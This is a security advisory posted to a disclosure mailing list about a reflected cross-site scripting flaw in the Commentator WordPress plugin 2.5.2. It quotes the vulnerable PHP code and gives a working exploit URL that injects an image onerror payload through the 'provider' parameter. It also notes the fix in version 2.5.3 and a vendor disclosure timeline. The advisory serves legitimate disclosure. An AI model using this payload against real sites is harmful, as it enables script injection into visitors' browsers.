[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Commentator Wordpress Plugin 2.5.2 XSS Vulnerability



## Full Disclosure

#Product  : Commentator Wordpress Plugin
#Exploit Author  : Rahul Pratap Singh
#Version  : 2.5.2
#Home page Link  :
http://codecanyon.net/item/commentator-wordpress-plugin/6425752
#Website	 : 0x62626262.wordpress.com
#Linkedin  : https://in.linkedin.com/in/rahulpratapsingh94
#Date  : 13/Jan/2016

XSS Vulnerability:

----------------------------------------
Description:
----------------------------------------
"provider" parameter is not sanitized that leads to Reflected XSS.

----------------------------------------
Vulnerable Code:
----------------------------------------
file: commentator.php

line:441
$provider_name = $_REQUEST["provider"];

line:544
<div id="commentator-social-signin" class="commentator-<?php echo
$provider_name; ?>">

----------------------------------------
Exploit:
----------------------------------------
/wp-admin/admin-ajax.php?action=commentator_social_signin&provider=facebook">%20<IMG%20SRC=axc%20onerror=alert(1)>

----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/commentatorxsspoc.png

Fix:
Update to 2.5.3

Disclosure Timeline:
reported to vendor  : 9/1/2016
vendor response     : 11/1/2016
vendor acknowledged : 11/1/2016
vendor deployed a patch: 11/1/2016

Pub ref:
http://codecanyon.net/item/commentator-wordpress-plugin/6425752
https://0x62626262.wordpress.com/2016/01/13/commentator-wordpress-plugin-xss-vulnerability

Attachment: 0x9ACF7D5F.asc
Description: application/pgp-keys

Attachment: signature.asc
Description: OpenPGP digital signature